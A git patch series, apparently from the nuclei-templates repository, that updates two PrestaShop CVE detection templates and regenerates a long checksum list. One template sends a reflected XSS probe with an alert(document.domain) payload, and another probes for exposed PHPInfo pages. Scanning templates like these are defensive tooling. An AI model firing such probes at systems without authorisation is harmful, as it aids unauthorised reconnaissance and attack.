status status: - 200 From 5da357447f8b47a889095f469791a41fdae5d1e7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 11 Sep 2023 12:14:30 +0530 Subject: [PATCH 0274/1090] Update CVE-2023-39676.yaml --- http/cves/2023/CVE-2023-39676.yaml | 22 ++++++++++++++-------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 97cfb6b967..3fc6ff4a37 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -1,27 +1,33 @@ id: CVE-2023-39676 + info: - name: PrestaShop XSS in fieldpopupnewsletter module + name: PrestaShop XSS in fieldpopupnewsletter Module author: meme-lord severity: medium - description: PrestaShop module fieldpopupnewsletter is vulnerable to XSS + description: | + SimpleImportProduct Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php. reference: - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/ + metadata: + max-request: 1 + shodan-query: html:"fieldpopupnewsletter" + verified: "true" tags: cve,cve2023,prestashop,xss http: - method: GET path: - - "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(0)%3C/script%3E" + - "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - - "" + - "" - "Invalid email" condition: and + + - type: status + status: + - 200 From d888ca0d4b48b38c9329f8187b953debde25e14e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 11 Sep 2023 12:27:02 +0530 Subject: [PATCH 0275/1090] Update CVE-2023-39677.yaml --- http/cves/2023/CVE-2023-39677.yaml | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index 5257c10d3e..a95a85b014 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -1,12 +1,17 @@ id: CVE-2023-39677 + info: - name: PrestaShop MyPrestaModules PHPInfo + name: PrestaShop MyPrestaModules PHPInfo - Disclosure author: meme-lord severity: low description: PrestaShop modules by MyPrestaModules expose PHPInfo reference: - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/ - tags: cve,cve2023,prestashop,phpinfo + metadata: + max-request: 1 + shodan-query: http.component:"PrestaShop" + verified: "true" + tags: cve,cve2023,prestashop,phpinfo,disclosure http: - method: GET @@ -16,10 +21,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -27,6 +28,10 @@ http: - "PHP Version" condition: and + - type: status + status: + - 200 + extractors: - type: regex part: body From 3eebc012be07bd9cdf3a21667cf66c728fb78ec4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Sep 2023 07:21:35 +0000 Subject: [PATCH 0276/1090] Auto Generated New Template Addition List [Mon Sep 11 07:21:35 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a6b27055ac..5c87c06231 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/exposed-panels/greenbone-panel.yaml http/exposed-panels/jorani-panel.yaml http/exposed-panels/snapcomms-panel.yaml http/exposures/apis/seafile-api.yaml +http/exposures/files/bun-lock.yaml http/miscellaneous/external-service-interaction.yaml http/miscellaneous/rdap-whois.yaml http/misconfiguration/ecology-info-leak.yaml From 41813ea039f840e69c42c0374b565bbeaabf403a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Sep 2023 07:22:00 +0000 Subject: [PATCH 0277/1090] Auto Generated Templates Checksum [Mon Sep 11 07:22:00 UTC 2023] :robot: --- templates-checksum.txt | 409 +++++++++++++++++++++-------------------- 1 file changed, 205 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 497e808658..352d2f8c11 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:c4cc92fde64428a2e1e877b68f77a574c44e3b78 TEMPLATES-STATS.md:67c1555dd476c5b59ee278a560384ea46af7ee57 TOP-10.md:fa6189d7c66fbd05133727e032d48a030274079b contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:a48f2da2d6835e4ae6f052719576ef1d926e5daa -cves.json-checksum.txt:8da30c988970c728c8fcfdd22abc8e4095f9ca9e +cves.json:50ad24f7101b7875bd72ee8c22d5310b2e1a8ed5 +cves.json-checksum.txt:f8967aefd08c72c7ae46c998df61cc4f4f8a494e dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c @@ -529,7 +529,7 @@ helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c47 helpers/wordpress/plugins/user-role-editor.txt:e4dcf50721abd61e4b9d3234623bdf059936514b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/w3-total-cache.txt:51ddbf27bf181d542a23643649c61739795a6771 -helpers/wordpress/plugins/webp-converter-for-media.txt:dd8876f26410100e97e67865e656783fe4e439f6 +helpers/wordpress/plugins/webp-converter-for-media.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675c6658f16be3165b8e0f1 @@ -3891,6 +3891,7 @@ http/exposures/files/azure-pipelines-exposed.yaml:9324ec7e5dbb0c7eb902074418f3eb http/exposures/files/bitbucket-pipelines.yaml:b15296a2d307f3992f20af82eaed3b76ccc81084 http/exposures/files/bower-json.yaml:4a2c6101109066af8b7417ffab17738a33d07774 http/exposures/files/build-properties.yaml:b662be2a91e9b9244f413333e3e6572f535fdc23 +http/exposures/files/bun-lock.yaml:e56673a5beb0ac2891e9e92e8ae932456cbc791c http/exposures/files/cargo-lock-package.yaml:c42864f006b58db6889740700d9652299a0f1d21 http/exposures/files/cargo-toml-file.yaml:dd41012cf3b8b0d0564e80b27d252cd140bc5217 http/exposures/files/cloud-config.yaml:5b8e2219436fa8f9f89ac4b008a3cd8dd8211529 @@ -5812,218 +5813,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf 